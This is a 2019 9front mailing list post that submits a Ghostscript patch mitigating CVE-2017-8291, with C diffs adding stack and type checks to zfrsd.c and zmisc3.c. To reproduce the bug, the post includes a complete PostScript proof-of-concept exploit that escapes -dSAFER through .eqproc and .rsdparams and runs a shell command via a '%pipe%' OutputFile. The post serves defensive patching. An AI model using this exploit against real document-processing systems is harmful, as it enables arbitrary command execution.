9front - general discussion about 9front
 help / color / mirror / Atom feed
From: Jacob Moody <jsmoody@iastate.edu>
To: 9front@9front.org
Subject: [9front] ghostscript: Mitigations against CVE-2017-8291
Date: Fri, 21 Jun 2019 05:53:16 -0500	[thread overview]
Message-ID: <CA+gzr0+-jeWnYT+OyppDNeOqxZsbsxe2a-HqB+tkHHk4m2MS3Q@mail.gmail.com> (raw)

All,

Grabbed the upstream changes for the mitigation against CVE-2017-8291.
The proof of concepts I found online do not seem to do anything
interesting besides hang gs indefinitely or suicide.

To reproduce:
gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100


/size_from  10000      def
/size_step    500      def
/size_to   65000      def
/enlarge    1000      def

%/bigarr 65000 array def

0
size_from size_step size_to {
    pop
    1 add
} for

/buffercount exch def

/buffersizes buffercount array def


0
size_from size_step size_to {
    buffersizes exch 2 index exch put
    1 add
} for
pop

/buffers buffercount array def

0 1 buffercount 1 sub {
    /ind exch def
    buffersizes ind get /cursize exch def
    cursize string /curbuf exch def
    buffers ind curbuf put
    cursize 16 sub 1 cursize 1 sub {
        curbuf exch 255 put
    } for
} for


/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def

enlarge array aload

{
    .eqproc
    buffersearchvars 0 buffersearchvars 0 get 1 add put
    buffersearchvars 1 0 put
    buffersearchvars 2 0 put
    buffercount {
        buffers buffersearchvars 1 get get
        buffersizes buffersearchvars 1 get get
        16 sub get
        254 le {
            buffersearchvars 2 1 put
            buffersearchvars 3 buffers buffersearchvars 1 get get put
            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
        } if
        buffersearchvars 1 buffersearchvars 1 get 1 add put
    } repeat

    buffersearchvars 2 get 1 ge {
        exit
    } if
    %(.) print
} loop

.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put


buffersearchvars 0 get array aload

sdevice 0 get
16#3e8 0 put

sdevice 0 get
16#3b0 0 put

sdevice 0 get
16#3f0 0 put


currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf

.


Patch:
diff -r 986e26228cfe sys/src/cmd/gs/src/zfrsd.c
--- a/sys/src/cmd/gs/src/zfrsd.c    Thu May 23 14:59:28 2019 +0200
+++ b/sys/src/cmd/gs/src/zfrsd.c    Fri Jun 21 05:34:42 2019 -0500
@@ -47,13 +47,19 @@
     ref *pFilter;
     ref *pDecodeParms;
     int Intent;
-    bool AsyncRead;
+    bool AsyncRead = false;
     ref empty_array, filter1_array, parms1_array;
     uint i;
-    int code;
+    int code = 0;
+
+    if (ref_stack_count(&o_stack) < 1)
+        return_error(e_stackunderflow);
+    if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))
+         return_error(e_typecheck);

     make_empty_array(&empty_array, a_readonly);
-    if (dict_find_string(op, "Filter", &pFilter) > 0) {
+    if (r_has_type(op, t_dictionary)
+        && dict_find_string(op, "Filter", &pFilter) > 0) {
     if (!r_is_array(pFilter)) {
         if (!r_has_type(pFilter, t_name))
         return_error(e_typecheck);
@@ -92,10 +98,12 @@
         return_error(e_typecheck);
     }
     }
-    if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
-    (code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0
-    )
-    return code;
+    if (r_has_type(op, t_dictionary))
+        code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);
+
+    if (r_has_type(op, t_dictionary))
+        if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
+            return code;
     push(1);
     op[-1] = *pFilter;
     if (pDecodeParms)
diff -r 986e26228cfe sys/src/cmd/gs/src/zmisc3.c
--- a/sys/src/cmd/gs/src/zmisc3.c    Thu May 23 14:59:28 2019 +0200
+++ b/sys/src/cmd/gs/src/zmisc3.c    Fri Jun 21 05:34:42 2019 -0500
@@ -55,6 +55,12 @@
     ref2_t stack[MAX_DEPTH + 1];
     ref2_t *top = stack;

+    if (ref_stack_count(&o_stack) < 2)
+        return_error(e_stackunderflow);
+    if (!r_is_array(op - 1) || !r_is_array(op)) {
+        return_error(e_typecheck);
+    }
+
     make_array(&stack[0].proc1, 0, 1, op - 1);
     make_array(&stack[0].proc2, 0, 1, op);
     for (;;) {



Thanks,

moody


             reply	other threads:[~2019-06-21 10:53 UTC|newest]

Thread overview: 2+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2019-06-21 10:53 Jacob Moody [this message]
2019-06-21 16:57 cinap_lenrek

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=CA+gzr0+-jeWnYT+OyppDNeOqxZsbsxe2a-HqB+tkHHk4m2MS3Q@mail.gmail.com \
    --to=jsmoody@iastate.edu \
    --cc=9front@9front.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body. 
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).